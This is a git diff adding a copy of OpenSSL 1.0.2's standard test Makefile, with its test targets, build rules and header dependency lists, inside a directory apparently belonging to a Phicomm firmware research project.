+rmdtest.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+rmdtest.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+rmdtest.o: ../include/openssl/ossl_typ.h ../include/openssl/ripemd.h
+rmdtest.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+rmdtest.o: ../include/openssl/symhacks.h rmdtest.c
+rsa_test.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+rsa_test.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+rsa_test.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+rsa_test.o: ../include/openssl/lhash.h ../include/openssl/opensslconf.h
+rsa_test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+rsa_test.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+rsa_test.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+rsa_test.o: ../include/openssl/symhacks.h rsa_test.c
+sha1test.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+sha1test.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+sha1test.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+sha1test.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+sha1test.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+sha1test.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+sha1test.o: ../include/openssl/sha.h ../include/openssl/stack.h
+sha1test.o: ../include/openssl/symhacks.h sha1test.c
+shatest.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+shatest.o: ../include/openssl/bn.h ../include/openssl/crypto.h
+shatest.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+shatest.o: ../include/openssl/obj_mac.h ../include/openssl/objects.h
+shatest.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+shatest.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+shatest.o: ../include/openssl/sha.h ../include/openssl/stack.h
+shatest.o: ../include/openssl/symhacks.h shatest.c
+srptest.o: ../include/openssl/opensslconf.h srptest.c
+ssltest.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+ssltest.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+ssltest.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+ssltest.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+ssltest.o: ../include/openssl/dtls1.h ../include/openssl/e_os2.h
+ssltest.o: ../include/openssl/err.h ../include/openssl/evp.h
+ssltest.o: ../include/openssl/hmac.h ../include/openssl/kssl.h
+ssltest.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+ssltest.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+ssltest.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+ssltest.o: ../include/openssl/pem.h ../include/openssl/pem2.h
+ssltest.o: ../include/openssl/pkcs7.h ../include/openssl/pqueue.h
+ssltest.o: ../include/openssl/rand.h ../include/openssl/rsa.h
+ssltest.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+ssltest.o: ../include/openssl/srtp.h ../include/openssl/ssl.h
+ssltest.o: ../include/openssl/ssl2.h ../include/openssl/ssl23.h
+ssltest.o: ../include/openssl/ssl3.h ../include/openssl/stack.h
+ssltest.o: ../include/openssl/symhacks.h ../include/openssl/tls1.h
+ssltest.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+ssltest.o: ../include/openssl/x509v3.h ssltest.c
+v3nametest.o: ../e_os.h ../include/openssl/asn1.h ../include/openssl/bio.h
+v3nametest.o: ../include/openssl/bn.h ../include/openssl/buffer.h
+v3nametest.o: ../include/openssl/conf.h ../include/openssl/crypto.h
+v3nametest.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+v3nametest.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+v3nametest.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+v3nametest.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+v3nametest.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+v3nametest.o: ../include/openssl/pkcs7.h ../include/openssl/rsa.h
+v3nametest.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+v3nametest.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+v3nametest.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h
+v3nametest.o: ../include/openssl/x509v3.h v3nametest.c
+wp_test.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+wp_test.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+wp_test.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+wp_test.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+wp_test.o: ../include/openssl/whrlpool.h wp_test.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/Makefile.bak
new file mode 100644
index 0000000..7f67bae
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/test/Makefile.bak
@@ -0,0 +1,764 @@
+#
+# test/Makefile
+#
+
+DIR=		test
+TOP=		..
+CC=		cc
+INCLUDES=	-I$(TOP) -I../include $(KRB5_INCLUDES)
+CFLAG=		-g
+MAKEDEPEND=	$(TOP)/util/domd $(TOP) -MD $(MAKEDEPPROG)
+PERL=		perl
+# KRB5 stuff
+KRB5_INCLUDES=
+LIBKRB5=
+TEST=		igetest.c
+
+PEX_LIBS=
+EX_LIBS= #-lnsl -lsocket
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile maketests.com \
+	tests.com testenc.com tx509.com trsa.com tcrl.com tsid.com treq.com \
+	tpkcs7.com tpkcs7d.com tverify.com testgen.com testss.com testssl.com \
+	testca.com VMSca-response.1 VMSca-response.2
+
+DLIBCRYPTO= ../libcrypto.a
+DLIBSSL= ../libssl.a
+LIBCRYPTO= -L.. -lcrypto
+LIBSSL= -L.. -lssl
+
+BNTEST=		bntest
+ECTEST=		ectest
+ECDSATEST=	ecdsatest
+ECDHTEST=	ecdhtest
+EXPTEST=	exptest
+IDEATEST=	ideatest
+SHATEST=	shatest
+SHA1TEST=	sha1test
+SHA256TEST=	sha256t
+SHA512TEST=	sha512t
+MDC2TEST=	mdc2test
+RMDTEST=	rmdtest
+MD2TEST=	md2test
+MD4TEST=	md4test
+MD5TEST=	md5test
+HMACTEST=	hmactest
+WPTEST=		wp_test
+RC2TEST=	rc2test
+RC4TEST=	rc4test
+RC5TEST=	rc5test
+BFTEST=		bftest
+CASTTEST=	casttest
+DESTEST=	destest
+RANDTEST=	randtest
+DHTEST=		dhtest
+DSATEST=	dsatest
+METHTEST=	methtest
+SSLTEST=	ssltest
+RSATEST=	rsa_test
+ENGINETEST=	enginetest
+EVPTEST=	evp_test
+IGETEST=	igetest
+JPAKETEST=	jpaketest
+SRPTEST=	srptest
+V3NAMETEST=	v3nametest
+ASN1TEST=	asn1test
+HEARTBEATTEST=  heartbeat_test
+CONSTTIMETEST=  constant_time_test
+
+TESTS=		alltests
+
+EXE=	$(BNTEST)$(EXE_EXT) $(ECTEST)$(EXE_EXT)  $(ECDSATEST)$(EXE_EXT) $(ECDHTEST)$(EXE_EXT) $(IDEATEST)$(EXE_EXT) \
+	$(MD2TEST)$(EXE_EXT)  $(MD4TEST)$(EXE_EXT) $(MD5TEST)$(EXE_EXT) $(HMACTEST)$(EXE_EXT) $(WPTEST)$(EXE_EXT) \
+	$(RC2TEST)$(EXE_EXT) $(RC4TEST)$(EXE_EXT) $(RC5TEST)$(EXE_EXT) \
+	$(DESTEST)$(EXE_EXT) $(SHATEST)$(EXE_EXT) $(SHA1TEST)$(EXE_EXT) $(SHA256TEST)$(EXE_EXT) $(SHA512TEST)$(EXE_EXT) \
+	$(MDC2TEST)$(EXE_EXT) $(RMDTEST)$(EXE_EXT) \
+	$(RANDTEST)$(EXE_EXT) $(DHTEST)$(EXE_EXT) $(ENGINETEST)$(EXE_EXT) \
+	$(BFTEST)$(EXE_EXT) $(CASTTEST)$(EXE_EXT) $(SSLTEST)$(EXE_EXT) $(EXPTEST)$(EXE_EXT) $(DSATEST)$(EXE_EXT) $(RSATEST)$(EXE_EXT) \
+	$(EVPTEST)$(EXE_EXT) $(IGETEST)$(EXE_EXT) $(JPAKETEST)$(EXE_EXT) $(SRPTEST)$(EXE_EXT) \
+	$(ASN1TEST)$(EXE_EXT) $(V3NAMETEST)$(EXE_EXT) $(HEARTBEATTEST)$(EXE_EXT) \
+	$(CONSTTIMETEST)$(EXE_EXT)
+
+# $(METHTEST)$(EXE_EXT)
+
+OBJ=	$(BNTEST).o $(ECTEST).o  $(ECDSATEST).o $(ECDHTEST).o $(IDEATEST).o \
+	$(MD2TEST).o $(MD4TEST).o $(MD5TEST).o \
+	$(HMACTEST).o $(WPTEST).o \
+	$(RC2TEST).o $(RC4TEST).o $(RC5TEST).o \
+	$(DESTEST).o $(SHATEST).o $(SHA1TEST).o $(SHA256TEST).o $(SHA512TEST).o \
+	$(MDC2TEST).o $(RMDTEST).o \
+	$(RANDTEST).o $(DHTEST).o $(ENGINETEST).o $(CASTTEST).o \
+	$(BFTEST).o  $(SSLTEST).o  $(DSATEST).o  $(EXPTEST).o $(RSATEST).o \
+	$(EVPTEST).o $(IGETEST).o $(JPAKETEST).o $(ASN1TEST).o $(V3NAMETEST).o \
+	$(HEARTBEATTEST).o $(CONSTTIMETEST).o
+
+SRC=	$(BNTEST).c $(ECTEST).c  $(ECDSATEST).c $(ECDHTEST).c $(IDEATEST).c \
+	$(MD2TEST).c  $(MD4TEST).c $(MD5TEST).c \
+	$(HMACTEST).c $(WPTEST).c \
+	$(RC2TEST).c $(RC4TEST).c $(RC5TEST).c \
+	$(DESTEST).c $(SHATEST).c $(SHA1TEST).c $(MDC2TEST).c $(RMDTEST).c \
+	$(RANDTEST).c $(DHTEST).c $(ENGINETEST).c $(CASTTEST).c \
+	$(BFTEST).c  $(SSLTEST).c $(DSATEST).c   $(EXPTEST).c $(RSATEST).c \
+	$(EVPTEST).c $(IGETEST).c $(JPAKETEST).c $(SRPTEST).c $(ASN1TEST).c \
+	$(V3NAMETEST).c $(HEARTBEATTEST).c $(CONSTTIMETEST).c
+
+EXHEADER= 
+HEADER=	testutil.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ..; $(MAKE) DIRS=$(DIR) TESTS=$(TESTS) all)
+
+all:	exe
+
+exe:	$(EXE) dummytest$(EXE_EXT)
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
+
+generate: $(SRC)
+$(SRC):
+	@sh $(TOP)/util/point.sh dummytest.c $@
+
+errors:
+
+install:
+
+tags:
+	ctags $(SRC)
+
+tests:	exe apps $(TESTS)
+
+apps:
+	@(cd ..; $(MAKE) DIRS=apps all)
+
+alltests: \
+	test_des test_idea test_sha test_md4 test_md5 test_hmac \
+	test_md2 test_mdc2 test_wp \
+	test_rmd test_rc2 test_rc4 test_rc5 test_bf test_cast test_aes \
+	test_rand test_bn test_ec test_ecdsa test_ecdh \
+	test_enc test_x509 test_rsa test_crl test_sid \
+	test_gen test_req test_pkcs7 test_verify test_dh test_dsa \
+	test_ss test_ca test_engine test_evp test_ssl test_tsa test_ige \
+	test_jpake test_srp test_cms test_ocsp test_v3name test_heartbeat \
+	test_constant_time
+
+test_evp: $(EVPTEST)$(EXE_EXT) evptests.txt
+	../util/shlib_wrap.sh ./$(EVPTEST) evptests.txt
+
+test_des: $(DESTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(DESTEST)
+
+test_idea: $(IDEATEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(IDEATEST)
+
+test_sha: $(SHATEST)$(EXE_EXT) $(SHA1TEST)$(EXE_EXT) $(SHA256TEST)$(EXE_EXT) $(SHA512TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(SHATEST)
+	../util/shlib_wrap.sh ./$(SHA1TEST)
+	../util/shlib_wrap.sh ./$(SHA256TEST)
+	../util/shlib_wrap.sh ./$(SHA512TEST)
+
+test_mdc2: $(MDC2TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(MDC2TEST)
+
+test_md5: $(MD5TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(MD5TEST)
+
+test_md4: $(MD4TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(MD4TEST)
+
+test_hmac: $(HMACTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(HMACTEST)
+
+test_wp: $(WPTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(WPTEST)
+
+test_md2: $(MD2TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(MD2TEST)
+
+test_rmd: $(RMDTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(RMDTEST)
+
+test_bf: $(BFTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(BFTEST)
+
+test_cast: $(CASTTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(CASTTEST)
+
+test_rc2: $(RC2TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(RC2TEST)
+
+test_rc4: $(RC4TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(RC4TEST)
+
+test_rc5: $(RC5TEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(RC5TEST)
+
+test_rand: $(RANDTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(RANDTEST)
+
+test_enc: ../apps/openssl$(EXE_EXT) testenc
+	@sh ./testenc
+
+test_x509: ../apps/openssl$(EXE_EXT) tx509 testx509.pem v3-cert1.pem v3-cert2.pem
+	echo test normal x509v1 certificate
+	sh ./tx509 2>/dev/null
+	echo test first x509v3 certificate
+	sh ./tx509 v3-cert1.pem 2>/dev/null
+	echo test second x509v3 certificate
+	sh ./tx509 v3-cert2.pem 2>/dev/null
+
+test_rsa: $(RSATEST)$(EXE_EXT) ../apps/openssl$(EXE_EXT) trsa testrsa.pem
+	@sh ./trsa 2>/dev/null
+	../util/shlib_wrap.sh ./$(RSATEST)
+
+test_crl: ../apps/openssl$(EXE_EXT) tcrl testcrl.pem
+	@sh ./tcrl 2>/dev/null
+
+test_sid: ../apps/openssl$(EXE_EXT) tsid testsid.pem
+	@sh ./tsid 2>/dev/null
+
+test_req: ../apps/openssl$(EXE_EXT) treq testreq.pem testreq2.pem
+	@sh ./treq 2>/dev/null
+	@sh ./treq testreq2.pem 2>/dev/null
+
+test_pkcs7: ../apps/openssl$(EXE_EXT) tpkcs7 tpkcs7d testp7.pem pkcs7-1.pem
+	@sh ./tpkcs7 2>/dev/null
+	@sh ./tpkcs7d 2>/dev/null
+
+test_bn: $(BNTEST)$(EXE_EXT) $(EXPTEST)$(EXE_EXT) bctest
+	@echo starting big number library test, could take a while...
+	@../util/shlib_wrap.sh ./$(BNTEST) >tmp.bntest
+	@echo quit >>tmp.bntest
+	@echo "running bc"
+	@<tmp.bntest sh -c "`sh ./bctest ignore`" | $(PERL) -e '$$i=0; while (<STDIN>) {if (/^test (.*)/) {print STDERR "\nverify $$1";} elsif (!/^0$$/) {die "\nFailed! bc: $$_";} else {print STDERR "."; $$i++;}} print STDERR "\n$$i tests passed\n"'
+	@echo 'test a^b%c implementations'
+	../util/shlib_wrap.sh ./$(EXPTEST)
+
+test_ec: $(ECTEST)$(EXE_EXT)
+	@echo 'test elliptic curves'
+	../util/shlib_wrap.sh ./$(ECTEST)
+
+test_ecdsa: $(ECDSATEST)$(EXE_EXT)
+	@echo 'test ecdsa'
+	../util/shlib_wrap.sh ./$(ECDSATEST)
+
+test_ecdh: $(ECDHTEST)$(EXE_EXT)
+	@echo 'test ecdh'
+	../util/shlib_wrap.sh ./$(ECDHTEST)
+
+test_verify: ../apps/openssl$(EXE_EXT)
+	@echo "The following command should have some OK's and some failures"
+	@echo "There are definitly a few expired certificates"
+	../util/shlib_wrap.sh ../apps/openssl verify -CApath ../certs/demo ../certs/demo/*.pem
+
+test_dh: $(DHTEST)$(EXE_EXT)
+	@echo "Generate a set of DH parameters"
+	../util/shlib_wrap.sh ./$(DHTEST)
+
+test_dsa: $(DSATEST)$(EXE_EXT)
+	@echo "Generate a set of DSA parameters"
+	../util/shlib_wrap.sh ./$(DSATEST)
+	../util/shlib_wrap.sh ./$(DSATEST) -app2_1
+
+test_gen testreq.pem: ../apps/openssl$(EXE_EXT) testgen test.cnf
+	@echo "Generate and verify a certificate request"
+	@sh ./testgen
+
+test_ss keyU.ss certU.ss certCA.ss certP1.ss keyP1.ss certP2.ss keyP2.ss \
+		intP1.ss intP2.ss: testss CAss.cnf Uss.cnf P1ss.cnf P2ss.cnf \
+                                   ../apps/openssl$(EXE_EXT)
+	@echo "Generate and certify a test certificate"
+	@sh ./testss
+	@cat certCA.ss certU.ss > intP1.ss
+	@cat certCA.ss certU.ss certP1.ss > intP2.ss
+
+test_engine:  $(ENGINETEST)$(EXE_EXT)
+	@echo "Manipulate the ENGINE structures"
+	../util/shlib_wrap.sh ./$(ENGINETEST)
+
+test_ssl: keyU.ss certU.ss certCA.ss certP1.ss keyP1.ss certP2.ss keyP2.ss \
+		intP1.ss intP2.ss $(SSLTEST)$(EXE_EXT) testssl testsslproxy \
+		../apps/server2.pem serverinfo.pem
+	@echo "test SSL protocol"
+	@if [ -n "$(FIPSCANLIB)" ]; then \
+	  sh ./testfipsssl keyU.ss certU.ss certCA.ss; \
+	fi
+	../util/shlib_wrap.sh ./$(SSLTEST) -test_cipherlist
+	@sh ./testssl keyU.ss certU.ss certCA.ss
+	@sh ./testsslproxy keyP1.ss certP1.ss intP1.ss
+	@sh ./testsslproxy keyP2.ss certP2.ss intP2.ss
+
+test_ca: ../apps/openssl$(EXE_EXT) testca CAss.cnf Uss.cnf
+	@if ../util/shlib_wrap.sh ../apps/openssl no-rsa; then \
+	  echo "skipping CA.sh test -- requires RSA"; \
+	else \
+	  echo "Generate and certify a test certificate via the 'ca' program"; \
+	  sh ./testca; \
+	fi
+
+test_aes: #$(AESTEST)
+#	@echo "test Rijndael"
+#	../util/shlib_wrap.sh ./$(AESTEST)
+
+test_tsa: ../apps/openssl$(EXE_EXT) testtsa CAtsa.cnf ../util/shlib_wrap.sh
+	@if ../util/shlib_wrap.sh ../apps/openssl no-rsa; then \
+	  echo "skipping testtsa test -- requires RSA"; \
+	else \
+	  sh ./testtsa; \
+	fi
+
+test_ige: $(IGETEST)$(EXE_EXT)
+	@echo "Test IGE mode"
+	../util/shlib_wrap.sh ./$(IGETEST)
+
+test_jpake: $(JPAKETEST)$(EXE_EXT)
+	@echo "Test JPAKE"
+	../util/shlib_wrap.sh ./$(JPAKETEST)
+
+test_cms: ../apps/openssl$(EXE_EXT) cms-test.pl smcont.txt
+	@echo "CMS consistency test"
+	$(PERL) cms-test.pl
+
+test_srp: $(SRPTEST)$(EXE_EXT)
+	@echo "Test SRP"
+	../util/shlib_wrap.sh ./srptest
+
+test_ocsp: ../apps/openssl$(EXE_EXT) tocsp
+	@echo "Test OCSP"
+	@sh ./tocsp
+
+test_v3name: $(V3NAMETEST)$(EXE_EXT)
+	@echo "Test X509v3_check_*"
+	../util/shlib_wrap.sh ./$(V3NAMETEST)
+
+test_heartbeat: $(HEARTBEATTEST)$(EXE_EXT)
+	../util/shlib_wrap.sh ./$(HEARTBEATTEST)
+
+test_constant_time: $(CONSTTIMETEST)$(EXE_EXT)
+	@echo "Test constant time utilites"
+	../util/shlib_wrap.sh ./$(CONSTTIMETEST)
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@if [ -z "$(THIS)" ]; then \
+	    $(MAKE) -f $(TOP)/Makefile reflect THIS=$@; \
+	else \
+	    $(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(SRC); \
+	fi
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+	rm -f $(SRC) $(SHA256TEST).c $(SHA512TEST).c evptests.txt newkey.pem testkey.pem \
+			testreq.pem
+
+clean:
+	rm -f .rnd tmp.bntest tmp.bctest *.o *.obj *.dll lib tags core .pure .nfs* *.old *.bak fluff $(EXE) *.ss *.srl log dummytest
+
+$(DLIBSSL):
+	(cd ..; $(MAKE) DIRS=ssl all)
+
+$(DLIBCRYPTO):
+	(cd ..; $(MAKE) DIRS=crypto all)
+
+BUILD_CMD=shlib_target=; if [ -n "$(SHARED_LIBS)" ]; then \
+		shlib_target="$(SHLIB_TARGET)"; \
+	fi; \
+	LIBRARIES="$(LIBSSL) $(LIBCRYPTO) $(LIBKRB5)"; \
+	$(MAKE) -f $(TOP)/Makefile.shared -e \
+		CC="$${CC}" APPNAME=$$target$(EXE_EXT) OBJECTS="$$target.o" \
+		LIBDEPS="$(PEX_LIBS) $$LIBRARIES $(EX_LIBS)" \
+		link_app.$${shlib_target}
+
+FIPS_BUILD_CMD=shlib_target=; if [ -n "$(SHARED_LIBS)" ]; then \
+		shlib_target="$(SHLIB_TARGET)"; \
+	fi; \
+	LIBRARIES="$(LIBSSL) $(LIBCRYPTO) $(LIBKRB5)"; \
+	if [ -z "$(SHARED_LIBS)" -a -n "$(FIPSCANLIB)" ] ; then \
+		FIPSLD_CC="$(CC)"; CC=$(FIPSDIR)/bin/fipsld; export CC FIPSLD_CC; \
+	fi; \
+	$(MAKE) -f $(TOP)/Makefile.shared -e \
+		CC="$${CC}" APPNAME=$$target$(EXE_EXT) OBJECTS="$$target.o" \
+		LIBDEPS="$(PEX_LIBS) $$LIBRARIES $(EX_LIBS)" \
+		link_app.$${shlib_target}
+
+BUILD_CMD_STATIC=shlib_target=; \
+	LIBRARIES="$(DLIBSSL) $(DLIBCRYPTO) $(LIBKRB5)"; \
+	$(MAKE) -f $(TOP)/Makefile.shared -e \
+		APPNAME=$$target$(EXE_EXT) OBJECTS="$$target.o" \
+		LIBDEPS="$(PEX_LIBS) $$LIBRARIES $(EX_LIBS)" \
+		link_app.$${shlib_target}
+
+$(RSATEST)$(EXE_EXT): $(RSATEST).o $(DLIBCRYPTO)
+	@target=$(RSATEST); $(BUILD_CMD)
+
+$(BNTEST)$(EXE_EXT): $(BNTEST).o $(DLIBCRYPTO)
+	@target=$(BNTEST); $(BUILD_CMD)
+
+$(ECTEST)$(EXE_EXT): $(ECTEST).o $(DLIBCRYPTO)
+	@target=$(ECTEST); $(BUILD_CMD)
+
+$(EXPTEST)$(EXE_EXT): $(EXPTEST).o $(DLIBCRYPTO)
+	@target=$(EXPTEST); $(BUILD_CMD)
+
+$(IDEATEST)$(EXE_EXT): $(IDEATEST).o $(DLIBCRYPTO)
+	@target=$(IDEATEST); $(BUILD_CMD)
+
+$(MD2TEST)$(EXE_EXT): $(MD2TEST).o $(DLIBCRYPTO)
+	@target=$(MD2TEST); $(BUILD_CMD)
+
+$(SHATEST)$(EXE_EXT): $(SHATEST).o $(DLIBCRYPTO)
+	@target=$(SHATEST); $(BUILD_CMD)
+
+$(SHA1TEST)$(EXE_EXT): $(SHA1TEST).o $(DLIBCRYPTO)
+	@target=$(SHA1TEST); $(BUILD_CMD)
+
+$(SHA256TEST)$(EXE_EXT): $(SHA256TEST).o $(DLIBCRYPTO)
+	@target=$(SHA256TEST); $(BUILD_CMD)
+
+$(SHA512TEST)$(EXE_EXT): $(SHA512TEST).o $(DLIBCRYPTO)
+	@target=$(SHA512TEST); $(BUILD_CMD)
+
+$(RMDTEST)$(EXE_EXT): $(RMDTEST).o $(DLIBCRYPTO)
+	@target=$(RMDTEST); $(BUILD_CMD)
+
+$(MDC2TEST)$(EXE_EXT): $(MDC2TEST).o $(DLIBCRYPTO)
+	@target=$(MDC2TEST); $(BUILD_CMD)
+
+$(MD4TEST)$(EXE_EXT): $(MD4TEST).o $(DLIBCRYPTO)
+	@target=$(MD4TEST); $(BUILD_CMD)
+
+$(MD5TEST)$(EXE_EXT): $(MD5TEST).o $(DLIBCRYPTO)
+	@target=$(MD5TEST); $(BUILD_CMD)
+
+$(HMACTEST)$(EXE_EXT): $(HMACTEST).o $(DLIBCRYPTO)
+	@target=$(HMACTEST); $(BUILD_CMD)
+
+$(WPTEST)$(EXE_EXT): $(WPTEST).o $(DLIBCRYPTO)
+	@target=$(WPTEST); $(BUILD_CMD)
+
+$(RC2TEST)$(EXE_EXT): $(RC2TEST).o $(DLIBCRYPTO)
+	@target=$(RC2TEST); $(BUILD_CMD)
+
+$(BFTEST)$(EXE_EXT): $(BFTEST).o $(DLIBCRYPTO)
+	@target=$(BFTEST); $(BUILD_CMD)
+
+$(CASTTEST)$(EXE_EXT): $(CASTTEST).o $(DLIBCRYPTO)
+	@target=$(CASTTEST); $(BUILD_CMD)
+
+$(RC4TEST)$(EXE_EXT): $(RC4TEST).o $(DLIBCRYPTO)
+	@target=$(RC4TEST); $(BUILD_CMD)
+
+$(RC5TEST)$(EXE_EXT): $(RC5TEST).o $(DLIBCRYPTO)
+	@target=$(RC5TEST); $(BUILD_CMD)
+
+$(DESTEST)$(EXE_EXT): $(DESTEST).o $(DLIBCRYPTO)
+	@target=$(DESTEST); $(BUILD_CMD)
+
+$(RANDTEST)$(EXE_EXT): $(RANDTEST).o $(DLIBCRYPTO)
+	@target=$(RANDTEST); $(BUILD_CMD)
+
+$(DHTEST)$(EXE_EXT): $(DHTEST).o $(DLIBCRYPTO)
+	@target=$(DHTEST); $(BUILD_CMD)
+
+$(DSATEST)$(EXE_EXT): $(DSATEST).o $(DLIBCRYPTO)
+	@target=$(DSATEST); $(BUILD_CMD)
+
+$(METHTEST)$(EXE_EXT): $(METHTEST).o $(DLIBCRYPTO)
+	@target=$(METHTEST); $(BUILD_CMD)
+
+$(SSLTEST)$(EXE_EXT): $(SSLTEST).o $(DLIBSSL) $(DLIBCRYPTO)
+	@target=$(SSLTEST); $(FIPS_BUILD_CMD)
+
+$(ENGINETEST)$(EXE_EXT): $(ENGINETEST).o $(DLIBCRYPTO)
+	@target=$(ENGINETEST); $(BUILD_CMD)
+
+$(EVPTEST)$(EXE_EXT): $(EVPTEST).o $(DLIBCRYPTO)
+	@target=$(EVPTEST); $(BUILD_CMD)
+
+$(ECDSATEST)$(EXE_EXT): $(ECDSATEST).o $(DLIBCRYPTO)
+	@target=$(ECDSATEST); $(BUILD_CMD)
+
+$(ECDHTEST)$(EXE_EXT): $(ECDHTEST).o $(DLIBCRYPTO)
+	@target=$(ECDHTEST); $(BUILD_CMD)
+
+$(IGETEST)$(EXE_EXT): $(IGETEST).o $(DLIBCRYPTO)
+	@target=$(IGETEST); $(BUILD_CMD)
+
+$(JPAKETEST)$(EXE_EXT): $(JPAKETEST).o $(DLIBCRYPTO)
+	@target=$(JPAKETEST); $(BUILD_CMD)
+
+$(ASN1TEST)$(EXE_EXT): $(ASN1TEST).o $(DLIBCRYPTO)
+	@target=$(ASN1TEST); $(BUILD_CMD)
+
+$(SRPTEST)$(EXE_EXT): $(SRPTEST).o $(DLIBCRYPTO)
+	@target=$(SRPTEST); $(BUILD_CMD)
+
+$(V3NAMETEST)$(EXE_EXT): $(V3NAMETEST).o $(DLIBCRYPTO)
+	@target=$(V3NAMETEST); $(BUILD_CMD)
+
+$(HEARTBEATTEST)$(EXE_EXT): $(HEARTBEATTEST).o $(DLIBCRYPTO)
+	@target=$(HEARTBEATTEST); $(BUILD_CMD_STATIC)
+
+$(CONSTTIMETEST)$(EXE_EXT): $(CONSTTIMETEST).o
+	@target=$(CONSTTIMETEST) $(BUILD_CMD)
+
+#$(AESTEST).o: $(AESTEST).c
+#	$(CC) -c $(CFLAGS) -DINTERMEDIATE_VALUE_KAT -DTRACE_KAT_MCT $(AESTEST).c
+
+#$(AESTEST)$(EXE_EXT): $(AESTEST).o $(DLIBCRYPTO)
+#	if [ "$(SHLIB_TARGET)" = "hpux-shared" -o "$(SHLIB_TARGET)" = "darwin-shared" ] ; then \
+#	  $(CC) -o $(AESTEST)$(EXE_EXT) $(CFLAGS) $(AESTEST).o $(PEX_LIBS) $(DLIBCRYPTO) $(EX_LIBS) ; \
+#	else \
+#	  $(CC) -o $(AESTEST)$(EXE_EXT) $(CFLAGS) $(AESTEST).o $(PEX_LIBS) $(LIBCRYPTO) $(EX_LIBS) ; \
+#	fi
+
+dummytest$(EXE_EXT): dummytest.o $(DLIBCRYPTO)
+	@target=dummytest; $(BUILD_CMD)
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+asn1test.o: ../include/openssl/asn1.h ../include/openssl/asn1_mac.h
+asn1test.o: ../include/openssl/bio.h ../include/openssl/bn.h
+asn1test.o: ../include/openssl/buffer.h ../include/openssl/crypto.h
+asn1test.o: ../include/openssl/dh.h ../include/openssl/dsa.h
+asn1test.o: ../include/openssl/e_os2.h ../include/openssl/evp.h
+asn1test.o: ../include/openssl/lhash.h ../include/openssl/obj_mac.h
+asn1test.o: ../include/openssl/objects.h ../include/openssl/opensslconf.h
+asn1test.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+asn1test.o: ../include/openssl/pkcs7.h ../include/openssl/rsa.h
+asn1test.o: ../include/openssl/safestack.h ../include/openssl/sha.h
+asn1test.o: ../include/openssl/stack.h ../include/openssl/symhacks.h
+asn1test.o: ../include/openssl/x509.h ../include/openssl/x509_vfy.h asn1test.c
+bftest.o: ../e_os.h ../include/openssl/blowfish.h ../include/openssl/e_os2.h
